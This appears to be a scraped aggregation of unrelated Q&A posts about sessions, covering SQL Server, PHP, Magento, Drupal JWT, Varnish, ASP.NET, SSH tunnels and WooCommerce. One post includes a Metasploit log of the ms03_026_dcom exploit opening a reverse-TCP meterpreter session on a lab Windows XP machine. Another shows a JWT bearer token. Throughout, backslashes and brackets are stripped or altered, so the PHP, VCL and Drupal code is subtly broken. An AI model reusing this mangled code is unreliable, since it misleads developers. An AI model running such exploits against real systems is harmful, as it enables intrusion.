Does SQL Server upgrade to table locks at total locks or session locks?

I’ve a table that both has mass sequential inserts at the end of the CI and random (very distributed) reads+updates. Naturally, the mass inserts should not block the random access. RCSI is used, so the read-only queries shouldn’t affect the lock count (?) in relation to the sequential insert.

My concern is that, even when limiting the maximum number of locks taken during the insert (eg. inserting in batches), it is possible for one (or more) of the OLTP updates to bypass this limit. If the lock count heuristic is per-session then it is less of potential issue.

Given the answer to the question in the title, then, what is the “best” way to prevent table lock escalation here?

My current approach/thought is to select a row count (eg. arbitrary of 1-4k) during the mass inserts to allow “some slack”, although this feels overall imprecise. While batches are essential anyway to deal with replication and such, it would be nice to specify a batch size of 5k rows and move on. (To be fair, quick table locks aren’t really the issue: the intent of the question is more about finding the edge such that table lock escalation doesn’t happen.)

There has been DBA pushback on both 1) disabling row locks (to ensure page locks and thus reduce lock courts) and 2) disabling table lock escalation (with forced page locks to minimize worst-case). Are there any other relevant database properties to consider with respect to lock escalation? (Increasing the lock limit to say, 10k would then allow a
much larger “slack” batch size.)

php – Pegar dados de session com foreach

parece simples, mas estou a noite toda pesquisando e testando diversos métodos e nao consigo nada. Entao, resolvi postar.

Tenho o seguinte item na session:

  array(6) {
    string(17) "teste app legenda"
    string(39) "https://..."
    string(294) "https://..."

Meu código para teste:

*linha 59:* foreach ($_SESSION as $array) {
*linha 60:* foreach($array as $key => $midia) {
*linha 61:* print "$key : $midia<br>";
*linha 62:* }
*linha 63:* }

Resultado, em tese, parece satisfatório…

getCreatedTime : 1618373661
getCaption : teste app legenda
getCommentsCount : 3
getLikesCount : 4
getLink : https://...
getImageHighResolutionUrl : https://...

Tenho os erros:

Warning: foreach() argument must be of type array|object, string given > **on line 60**
Warning: foreach() argument must be of type array|object, int given > **on line 60**

Para exibir os dados, por exemplo, nao tenho nenhum retorno


Ainda obtenho o erro:

Warning: Undefined array key "getCreatedTime"

Onde estou errando?

magento2.3 – Session destroyed in N genius payment gateway magento 2.3

I have created a N Genius hosted session payment gateway module for my project in magento 2.3 version. I have used an iframe to show the 3d secure form in this module. After the 3d secure submit i am setting some value in the checkout session for later use. Payment and order are placed successfully on the first try and from the next time, its not working because the data that i have saved in the session is not getting in the 3d response controller file. The sessions are getting destroyed and i have tried with customer session also, but no luck. Url i have checked, request and response use the same https url. Anyone have faced such issue? any idea about this?

flags – Success with cookie, fails with JWT: RuntimeException: Failed to start the session because headers have > already been sent by

My Controller is working with cookie auth but failing with JWT. This Controller is supposed to flag an entity for the logged-in user.

If I am using cookie auth, there are no errors and everything works as expected.

But when I try to use JWT, although the entity does get flagged correctly, I get the following error in the Drupal logs:

RuntimeException: Failed to start the session because headers have
already been sent by
“/app/vendor/symfony/http-foundation/Response.php” at line 377. in
(line 150 of

How do I fix this error?

Here’s how I’m using JWT auth in Postman:



  • Accept: application/vnd.api+json
  • Content-Type: application/vnd.api+json
  • Cache: no-cache
  • Authorization: Bearer eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE2MTgyMDk4MjAsImV4cCI6MTYyMzM5MzgyMCwiZHJ1cGFsIjp7InVpZCI6IjI3In19.5uDJMtokLXD6K63H5Ikb-F870EYFMrgE4mItTuTT3bI

Request body:

    "entity_id": "14"

As for the Controller, here’s MYMODULE.routing.yml:

  path: '/api/group_add'
    _controller: 'DrupalMYMODULEControllerApiFlagging::flag'
  methods: (POST)
    _permission: 'view own commerce_order'
    _format: 'json'
    no_cache: 'TRUE'

Here’s ApiFlagging.php:


namespace DrupalMYMODULEController;

use DrupalCoreControllerControllerBase;
use DrupalflagFlagServiceInterface;
use SymfonyComponentDependencyInjectionContainerInterface;
use SymfonyComponentHttpFoundationJsonResponse;
use SymfonyComponentHttpFoundationRequest;
use SymfonyComponentHttpKernelExceptionBadRequestHttpException;
use SymfonyComponentSerializerEncoderJsonEncoder;
use SymfonyComponentSerializerSerializer;

 * Class ApiFlagging.
 * Https://
class ApiFlagging extends ControllerBase {

  const FLAG_ID = 'ABC';

   * The flag service.
   * @var DrupalflagFlagServiceInterface
  protected $flagService;

   * The serializer.
   * @var SymfonyComponentSerializerSerializer
  protected $serializer;

   * The available serialization formats.
   * @var array
  protected $serializerFormats = ();

   * Constructs a new ApiFlagging object.
  public function __construct(Serializer $serializer, array $serializer_formats, FlagServiceInterface $flag) {
    $this->serializer = $serializer;
    $this->serializerFormats = $serializer_formats;
    $this->flagService = $flag;

   * {@inheritdoc}
  public static function create(ContainerInterface $container) {
    if ($container->hasParameter('serializer.formats') && $container->has('serializer')) {
      $serializer = $container->get('serializer');
      $formats = $container->getParameter('serializer.formats');
    else {
      $formats = ('json');
      $encoders = (new JsonEncoder());
      $serializer = new Serializer((), $encoders);

    return new static(

   * Flagging.
  public function flag(Request $request) {
    $format = $this->getRequestFormat($request);

    $content = $request->getContent();
    $flagData = $this->serializer->decode($content, $format);
    $flag = $this->flagService->getFlagById(self::FLAG_ID);
    $flaggableEntityTypeId = $flag->getFlaggableEntityTypeId();

    $my_goals = NULL;
    if (array_key_exists('goals', $flagData)) {
      $my_goals = $flagData('goals');

    $entity = Drupal::entityTypeManager()

    if ($my_goals === NULL) {
      return new JsonResponse((
        'error_message' => 'Goals not set.',
      ), 400);

    try {
      /** @var DrupalflagEntityFlagging $flagging */
      $flag->set('field_goals', $my_goals);
      $flagging = $this->flagService->flag($flag, $entity);
    catch (LogicException $e) {
      $message = $e->getMessage();
      kint('error', $e);
      return new JsonResponse((
        'error_message' => $message,
      ), 400);

    return new JsonResponse((
      'message' => 'flag success',
      'flagging_uuid' => $flagging->uuid(),
      'flagging_id' => $flagging->id(),
      'flag_id' => $flagging->getFlagId(),

   * Gets the format of the current request.
   * @param SymfonyComponentHttpFoundationRequest $request
   *   The current request.
   * @return string
   *   The format of the request.
  protected function getRequestFormat(Request $request) {
    $format = $request->getRequestFormat();
    if (!in_array($format, $this->serializerFormats)) {
      throw new BadRequestHttpException("Unrecognized format: $format.");
    return $format;


magento2 – Magento 2 Varnish caching add to cart session from another user

When adding an item to cart, it will also show a second item, which I have previously added to cart from a different device. If I bypass varnish cache, cart seems to work ok. Guess I am missing a setting about cookies and session? Here is my Varnish default.vcl

# VCL version 5.0 is not supported so it should be 4.0 even though actually used Varnish version is 6
vcl 4.1;

import std;

backend default {
    .path = "/run/nginx/nginx.sock"; = "localhost";
    #.port = "8080";
    .first_byte_timeout = 600s;
    .probe = {
        .url = "/health_check.php";
        .timeout = 2s;
        .interval = 5s;
        .window = 10;
        .threshold = 5;

acl purge {

sub vcl_recv {

    # Implementing websocket support (
    if (req.http.Upgrade ~ "(?i)websocket") {
    return (pipe);

    #Forbidd deny IPs
     if (client.ip ~ forbidden) {
        return(synth(403, "Forbidden"));

    # Normalize hostname to avoid double caching
    set = regsub(,
    "^$", ""); 
    # Allow purging from ACL
    if (req.method == "PURGE") {
        if (client.ip !~ purge) {
            return (synth(405, "Method not allowed"));

# To use the X-Pool header for purging varnish during automated deployments, make sure the X-Pool header
# has been added to the response in acl purgeyour backend server config. This is used, for example, by the
# capistrano-magento2 gem for purging old content from varnish during it's deploy routine.
        if (!req.http.X-Magento-Tags-Pattern && !req.http.X-Pool) {
            return (synth(400, "X-Magento-Tags-Pattern or X-Pool header required"));
        if (req.http.X-Magento-Tags-Pattern) {
          ban("obj.http.X-Magento-Tags ~ " + req.http.X-Magento-Tags-Pattern);
        if (req.http.X-Pool) {
          ban("obj.http.X-Pool ~ " + req.http.X-Pool);
       return (purge);


# Brotli Compression
if(req.http.Accept-Encoding ~ "br" && req.url !~
            ".(jpg|png|gif|gz|mp3|mov|avi|mpg|mp4|swf|wmf)$") {
        set req.http.X-brotli = "true";

# Tell PageSpeed not to use optimizations specific to this request.
  set req.http.PS-CapabilityList = "fully general optimizations only";

# Don't allow external entities to force beaconing.
  #unset req.http.PS-ShouldBeacon;

### Cookies

    # Remove any Google Analytics based cookies
      set req.http.Cookie = regsuball(req.http.Cookie, "__utm.=(^;)+(; )?", "");
      set req.http.Cookie = regsuball(req.http.Cookie, "_ga=(^;)+(; )?", "");
      set req.http.Cookie = regsuball(req.http.Cookie, "_gat=(^;)+(; )?", "");
      set req.http.Cookie = regsuball(req.http.Cookie, "utmctr=(^;)+(; )?", "");
      set req.http.Cookie = regsuball(req.http.Cookie, "utmcmd.=(^;)+(; )?", "");
      set req.http.Cookie = regsuball(req.http.Cookie, "utmccn.=(^;)+(; )?", "");

    # Remove DoubleClick offensive cookies
    set req.http.Cookie = regsuball(req.http.Cookie, "__gads=(^;)+(; )?", "");

    # Remove the AddThis cookies
    set req.http.Cookie = regsuball(req.http.Cookie, "__atuv.=(^;)+(; )?", "");

    # Remove has_js and Cloudflare/Google Analytics __* cookies.
    set req.http.Cookie = regsuball(req.http.Cookie, "(^|;s*)(_(_a-z)+|has_js)=(^;)*", "");
    # Remove a ";" prefix, if present.
    set req.http.Cookie = regsub(req.http.Cookie, "^;s*", "");

    if (req.http.X-Forwarded-Proto !~ "(?i)https" ) {
        set req.http.x-Redir-Url = "https://" + + req.url;
        return ( synth( 750 ));

    # Setting http headers for backend
    set req.http.X-Forwarded-For = client.ip;
    set req.http.X-Forwarded-Proto = "https";

    # Unset headers that might cause us to cache duplicate infos
    unset req.http.Accept-Language;
    unset req.http.User-Agent;
    ### Do not Cache: special cases ###

    # Do not cache AJAX requests.
    if (req.http.X-Requested-With == "XMLHttpRequest") {

    # Post requests will not be cached
    if (req.http.Authorization || req.method == "POST") {
    return (pass);
    # on PROXY connections the server.ip is the IP the client connected to.
    # (typically the DNS-visible SSL/TLS virtual IP)
    std.log("Client connected to " + server.ip);
    if (std.port(server.ip) || 443) {
        # client.ip for PROXY requests is set to the real client IP, not the
        # SSL/TLS terminating proxy.
        std.log("Real client connecting over SSL/TLS from " + client.ip);
        # Exclude from cache

        if (req.url ~ "^/pagespeed_admin") {
        if (req.url ~ "^/pagespeed_global_admin") {
        # Bypass shopping cart, checkout
        if (req.url ~ "^/checkout") {
        return (pass);

    if (req.http.User-Agent ~ "GoogleStackdriverMonitoring-UptimeChecks") {
        # Don't cache pagespeed as it already caches it's recources
        if (req.url ~ ".pagespeed.((a-z).)?(a-z){2}.(^.){20}.(^.)+") {
        return (pass);

    #If too many restarts
        if (req.restarts > 0) {
        set req.hash_always_miss = true;


# Only deal with "normal" types
    if (req.method != "GET" &&
        req.method != "HEAD" &&
        req.method != "PUT" &&
        req.method != "POST" &&
        req.method != "TRACE" &&
        req.method != "OPTIONS" &&
        req.method != "DELETE") {
          /* Non-RFC2616 or CONNECT which is weird. */
          return (pipe);

    # We only deal with GET and HEAD by default
    if (req.method != "GET" && req.method != "HEAD") {
        return (pass);

    # Bypass health check requests
    if (req.url ~ "/pub/health_check.php") {
        return (pass);

    # Set initial grace period usage status
    set req.http.grace = "none";

    # normalize url in case of leading HTTP scheme and domain
    set req.url = regsub(req.url, "^http(s)?://", "");

    # collect all cookies

    # Compression filter. See
    if (req.http.Accept-Encoding) {
        if (req.url ~ ".(jpg|jpeg|png|gif|gz|tgz|bz2|tbz|mp3|ogg|swf|flv)$") {
       # No point in compressing these
          unset req.http.Accept-Encoding;
        } elsif (req.http.Accept-Encoding ~ "gzip") {
            set req.http.Accept-Encoding = "gzip";
        } elsif (req.http.Accept-Encoding ~ "deflate" && req.http.user-agent !~ "MSIE") {
            set req.http.Accept-Encoding = "deflate";
        } else {
            # unknown algorithm
            unset req.http.Accept-Encoding;

    # Remove all marketing get parameters to minimize the cache objects
    if (req.url ~ "(?|&)(gclid|cx|ie|cof|siteurl|zanpid|origin|fbclid|mc_(a-z)+|utm_(a-z)+|_bta_(a-z)+)=") {
        set req.url = regsuball(req.url, "(gclid|cx|ie|cof|siteurl|zanpid|origin|fbclid|mc_(a-z)+|utm_(a-z)+|_bta_(a-z)+)=(-_A-z0-9+()%.)+&?", "");
        set req.url = regsub(req.url, "(?|&)+$", "");

    # Static files caching
    if (req.url ~ "^/(pub/)?(media|static)/.*.(ico|html|css|js|jpg|jpeg|png|gif|tiff|webp|bmp|mp3|ogg|svg|swf|woff|woff2|eot|ttf|otf)$") {
       # Static files should not be cached by default
        return (pass);

        #But if you use a few locales and don't use CDN you can enable caching static files by commenting previous line (#return (pass);) and uncommenting next 3 lines
        #unset req.http.Https;
        #unset req.http.X-Forwarded-Proto;
        #unset req.http.Cookie;

    # Authenticated GraphQL requests should not be cached by default
    if (req.url ~ "/graphql" && req.http.Authorization ~ "^Bearer") {
        return (pass);

    return (hash);

sub vcl_synth {

if (resp.status == 750) {
        set resp.status = 301;
        set resp.http.Location = req.http.x-Redir-Url;
sub vcl_hash {
    # Brotli
    if(req.http.X-brotli == "true" && req.http.X-brotli-unhash != "true") {
    if (req.http.cookie ~ "X-Magento-Vary=") {
        hash_data(regsub(req.http.cookie, "^.*?X-Magento-Vary=((^;)+);*.*$", "1"));

    # For multi site configurations to not cache each other's content
    if ( {
    } else {

    if (req.url ~ "/graphql") {
        call process_graphql_headers;


sub process_graphql_headers {
    if (req.http.Store) {
    if (req.http.Content-Currency) {

sub vcl_backend_fetch {
    if(bereq.http.X-brotli == "true") {
        set bereq.http.Accept-Encoding = "br";
        unset bereq.http.X-brotli;

sub vcl_pipe {
    if (req.http.upgrade) {
      set bereq.http.upgrade = req.http.upgrade;

    return (pipe);

sub vcl_backend_response {
set beresp.http.X-Host =;

 set beresp.grace = 3d;

if (beresp.http.Content-Type ~ "text/html") {
     unset beresp.http.Cache-Control;
     set beresp.http.Cache-Control = "no-cache, max-age=0";
   return (deliver);    

if (beresp.http.content-type ~ "text") {
        set beresp.do_esi = true;

    if (bereq.url ~ ".js$" || beresp.http.content-type ~ "text") {
        set beresp.do_gzip = true;

    if (beresp.http.X-Magento-Debug) {
        set beresp.http.X-Magento-Cache-Control = beresp.http.Cache-Control;

   # cache only successfully responses and 404s
    if (beresp.status != 200 && beresp.status != 404) {
        set beresp.ttl = 0s;
        set beresp.uncacheable = true;
        return (deliver);
    } elsif (beresp.http.Cache-Control ~ "private") {
        set beresp.uncacheable = true;
        set beresp.ttl = 86400s;
        return (deliver);

    # validate if we need to cache it and prevent from setting cookie
    if (beresp.ttl > 0s && (bereq.method == "GET" || bereq.method == "HEAD")) {
        unset beresp.http.set-cookie;
    #unsets the cookie for GET or HEAD requests.
    if (bereq.url !~ ".(ico|css|js|jpg|jpeg|png|gif|tiff|bmp|gz|tgz|bz2|tbz|mp3|ogg|svg|swf|woff|woff2|eot|ttf|otf)(?|$)") {
  set beresp.http.Pragma = "no-cache";
  set beresp.http.Expires = "-1";
  set beresp.http.Cache-Control = "no-store, no-cache, must-revalidate, max-age=0";

   # "Microcache" for search
   if (bereq.url ~ "/catalogsearch") {
       set beresp.ttl = 30m;

   # If page is not cacheable then bypass varnish for 2 minutes as Hit-For-Pass
   if (beresp.ttl <= 0s ||
       beresp.http.Surrogate-control ~ "no-store" ||
       (!beresp.http.Surrogate-Control &&
       beresp.http.Cache-Control ~ "no-cache|no-store") ||
       beresp.http.Vary == "*") {
        # Mark as Hit-For-Pass for the next 2 minutes
        set beresp.ttl = 120s;
        set beresp.uncacheable = true;

    return (deliver);

sub vcl_deliver {
    if (resp.http.X-Magento-Debug) {
        if (resp.http.x-varnish ~ " ") {
            set resp.http.X-Magento-Cache-Debug = "HIT";
            set resp.http.Grace = req.http.grace;
        } else {
            set resp.http.X-Magento-Cache-Debug = "MISS";
    } else {
        unset resp.http.Age;

    unset resp.http.X-Magento-Debug;
    unset resp.http.X-Magento-Tags;
    unset resp.http.X-Powered-By;
    unset resp.http.Server;
    unset resp.http.X-Varnish;
    unset resp.http.Via;
    unset resp.http.Link;

sub vcl_hit {

    if (obj.ttl >= 0s) {
        # Hit within TTL period
        return (deliver);
    if (std.healthy(req.backend_hint)) {
        if (obj.ttl + 300s > 0s) {
            # Hit after TTL expiration, but within grace period
            set req.http.grace = "normal (healthy server)";
            return (deliver);
        } else {
            # Hit after TTL and grace expiration
            return (restart);
    } else {
        # server is not healthy, retrieve from cache
        set req.http.grace = "unlimited (unhealthy server)";
        return (deliver);

sub vcl_purge {
   # repeat purge for brotli or gzip object 
    # (force hash/no hash on "brotli" while doing another purge)
    # set Accept-Encoding: gzip so that we don't get brotli-encoded response upon purge

    if (req.url !~ ".(jpg|png|gif|gz|mp3|mov|avi|mpg|mp4|swf|wmf)$" && 
            !req.http.X-brotli-unhash) {
        if (req.http.X-brotli == "true") {
            set req.http.X-brotli-unhash = "true";
            set req.http.Accept-Encoding = "gzip";
        } else {
            set req.http.X-brotli-unhash = "false";
            set req.http.Accept-Encoding = "br";
        return (restart);
} core – Session Scoped Dependency Injection vs Caching in Data Access Layer

The issue at hand is that I don’t want to repeatedly hit the DB to look up user information for the logged in user over the course of the many requests made within a single session.

My first inclination is to use Session Scoped Dependency Injection, however this isn’t possible with out of the box DI features provided by Microsoft. I could install Autofac and that seems like a perfectly reasonable solution to me, however I seem to recall reading why Microsoft didn’t include the ability to do this because they felt it was a bad practice… but I don’t recall what their reasons were at the moment.

Then it occurred to me that the way people at Microsoft would probably handle this is through the fact that Entity Framework would just cache the results. However, I’m not using EF and the solution I’m using does not provide caching though I could easily add some caching to it.

So I’m wondering if I should 1) Install Autofac or 2) Add caching features to my data access layer.

Are there any serious reasons I should avoid 1) (i.e. not avoid installing Autofac generally, but doing it for the purpose of using Session Scoped DI, obviously)? Because I think that’s what I will probably end up doing unless I can find a substantial reason not to.

tunneling – SSH reverse tunnels: can the intermediate server eavesdrop on an SSH session?

Suppose there are three computers: (1) my laptop, (2) a server that has a public static IP address, and (3) a Raspberry Pi behind a NAT. I connect from (1) to (3) via (2) as explained below.

On the server (2), I add GatewayPorts yes to /etc/ssh/sshd-config, and restart the SSH daemon: sudo systemctl reload sshd.service.

On the Raspberry Pi, I create a reverse SSH tunnel to the server:

rpi$ ssh -R 2222:localhost:22 username-on-server@server-ip-address

On my laptop, I am now able to connect to the Raspberry Pi using:

laptop$ ssh -p 2222 username-on-pi@server-ip-address

The question is: is the server able to see the data sent between my laptop and the Raspberry Pi? Can the server eavesdrop on the SSH session between my laptop and the Raspberry Pi?

windows – Unknown Command problem in Meterpreter Win XP session

Using VirtualBox Kali machine to attach Win XP SP0 machine and managing to establish meterpreter session running windows/meterpreter/reverse_tcp which appears to succesfully open a meterpreter session. However, no commands execute at the meterpreter prompt. pwd, ls etc all just respond Unknown command: pwd

msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
(*) Started reverse TCP handler on 
(*) - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
(*) - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp: ...
(*) - Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp: ...
(*) - Sending exploit ...
(*) Encoded stage with x86/shikata_ga_nai
(*) Sending encoded stage (175203 bytes) to
(*) Meterpreter session 8 opened ( -> at 2021-03-23 06:36:35 -0400
meterpreter > pwd
(-) Unknown command: pwd.

Any help on getting commands to work on remote machine much appreciated.

Session variable disappears after callback to WooCommerce gateway API link

I am trying to create a plugin for WooCommerce that stores some value into $_SESSION(‘myVar’) before payment process and get it on Thank You page back.
Everything works fine, but when I use a gateway, that makes a callback with POST info about payment to the $_SESSION(‘myVar’) becomes empty and I can’t get value from it on the Thank You page.

How I did it:

// Reg. the session   
add_action( 'init', __CLASS__ . '::register_session' );

public static function register_session() {

    if( !session_id() ) {


// Set the session variable before payment
$_SESSION('myVar') = 'my value';

// Trying to get the session value after payment
echo $_SESSION('myVar'); // NULL

Thank you!